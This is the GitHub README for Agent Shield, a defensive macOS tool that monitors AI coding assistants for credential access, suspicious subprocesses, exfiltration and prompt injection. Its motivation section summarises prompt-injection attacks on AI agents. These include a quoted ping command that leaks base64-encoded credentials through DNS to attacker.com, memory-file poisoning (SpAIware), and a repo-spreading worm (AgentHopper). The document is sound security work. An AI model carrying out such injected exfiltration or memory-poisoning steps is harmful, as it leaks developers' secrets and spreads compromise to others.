Skip to content

shahar-dagan/agent-shield

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Agent Shield

Runtime security monitor for AI coding tools on macOS.

Watches Claude Code, Cursor, Cline, Copilot, and Codex at the OS level — file reads, subprocess spawning, network connections, and AI memory directories — and alerts when something looks wrong.

All event data stays in a local SQLite database.


Why this exists

AI coding tools have broad filesystem and network access. Between keystrokes, you have no visibility into which files they're reading, what subprocesses they're spawning, or whether they've touched your .env or ~/.ssh.

Three attacks shaped what this monitors:

CVE-2025-55284 — Prompt injection causes Claude Code to run ping $(base64-encoded-credentials).attacker.com. Your API keys leave via DNS — invisible to HTTPS-layer proxies.

SpAIware (Windsurf, August 2025) — Malicious content injected into AI memory files. Every future session silently exfiltrates data before doing any work. The injection point is a file, not a network request.

AgentHopper — AI reads a malicious repo, injects payloads into local source files, git-pushes to spread, infects the next developer's agent. No single event looks alarming; the sequence is: file read → file write → git push.

That last one is why the cross-event correlation engine exists. Individual events are normal. The sequence is not.


What's built

  • FSEvents file watcher — real-time, no polling; watches sensitive paths (~/.ssh/, ~/.aws/, .env files) and AI memory directories (~/.claude/, ~/.cursor/, etc.)
  • Process tree monitoring — tracks subprocess chains spawned by AI tools
  • Network classification — classifies outbound connections as known-safe, unknown, or threat-intel-flagged
  • Cross-event sequence detectioncred read → unknown network → git push triggers a combined alert
  • Two-phase injection scanning — fast regex first, Claude API only on regex hits (keeps cost low)
  • SpAIware detection — FSEvents watcher on AI memory directories
  • MCP server allowlisting — discovers and tracks Model Context Protocol servers
  • Weekly threat intel refresh — research agent (Exa + Claude) updates detection rules automatically
  • Policy enforcement — kill/suspend/block on confirmed threats (opt-in; monitor-only by default)
  • Web dashboard at localhost:6080
  • Menu bar app — quick status and alerts

Quick start

Requirements: macOS (FSEvents is Apple-specific), Python 3.11+

git clone https://github.com/shahar-dagan/ai-security.git
cd ai-security
pip install -r requirements.txt

# Start the monitor daemon
python3 collector.py

# Dashboard at http://localhost:6080
python3 web.py

To run as a background service:

cp com.aisecurity.collector.plist ~/Library/LaunchAgents/
launchctl load ~/Library/LaunchAgents/com.aisecurity.collector.plist

To stop:

launchctl unload ~/Library/LaunchAgents/com.aisecurity.collector.plist
pkill -f collector.py

Dashboard

The web dashboard (http://localhost:6080) shows:

Tab What it shows
Processes AI tools and their process trees, live
Network Outbound connections classified by trust level
Unknown Hosts Connections to unrecognized destinations
Files File access events, tiered by sensitivity
Sensitive Accesses to credentials and config files
Injections Prompt injection scan results
Policy Events Enforcement actions taken
MCP Servers Discovered MCP servers and allowlist status
Packages Supply chain scan results for AI-installed packages
Settings Policy configuration and enforcement toggles

AI incident analysis

If you set ANTHROPIC_API_KEY, the AI incident analyst activates. When a security event is flagged, it sends context to the Claude API to generate a plain-language incident report explaining what happened and why it looks suspicious.

Privacy note: The AI analyst sends process names, file paths, hostnames, and IP addresses to the Anthropic API. No raw file contents are sent. You can disable it in Settings → AI Incident Analysis to run entirely on-device with no external API calls.

Without ANTHROPIC_API_KEY, Agent Shield runs fully local with no external network calls.


CLI

# Event statistics
python3 query.py stats

# Recent alerts (last 24 hours)
python3 query.py alerts --days 1

# Incident reports
python3 query.py incidents

Threat intel

threat_intel/latest.json is loaded at startup by the file scanner and network classifier. It extends the built-in detection rules with patterns from recent research.

To refresh threat intel manually:

EXA_API_KEY=<key> ANTHROPIC_API_KEY=<key> python3 -m agents.research_agent

Or run the research agent on a daily loop:

EXA_API_KEY=<key> ANTHROPIC_API_KEY=<key> python3 -m agents.research_agent --loop

Architecture

collector.py              main daemon — orchestrates all components
  monitor.py              process/file/net polling, threat classification
  sensitive_watcher.py    FSEvents watcher for credential/config paths
  memory_watcher.py       FSEvents watcher for AI memory dirs (SpAIware)
  loop_monitor.py         intra-session behavioral anomaly detection
  detector.py             cross-event sequence detection
  baseline.py             per-process behavioral baselining
  alerter.py              alert dedup, DB write, OS notifications
  analyst.py              Claude-powered incident investigation
  policy.py               enforcement: kill/suspend on confirmed threats
  mcp_watcher.py          MCP server discovery and allowlisting
  enrichment.py           binary signing, ASN lookup
  agents/
    injection_scanner.py  file injection detection (regex + Claude)
    package_scanner.py    supply chain detection (fast rules + Claude)
    research_agent.py     threat intel: Exa search → Claude → rule updates

Events are stored in events.db (SQLite, local only).


Why not a network proxy?

Tools like CodeGate, Pipelock, and Sysdig sit in the network path and inspect API calls. That architecture can't see file reads, subprocess spawning, or DNS exfiltration via ping. It can't monitor what the AI writes to its own memory directories, which is where SpAIware lives.

The attack surface isn't the API layer. It's the OS.


Honest limitations

  • macOS only — FSEvents is Apple-specific. Linux support would require inotify (not yet implemented)
  • Python daemon — no polished installer yet; requires manual setup
  • Monitor-only by default — enforcement (process kill, network block) is opt-in in Settings
  • No kernel extension — uses userspace APIs (FSEvents, lsof, psutil); a determined process could evade this

Tests

python3 -m pytest tests/ -v

Roadmap

See ROADMAP.md for the full plan: polished macOS agent, CI/CD scanner, shared threat intel layer, and team/enterprise distribution model.


License

MIT

About

Runtime security monitor for AI coding tools on macOS.

Topics

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors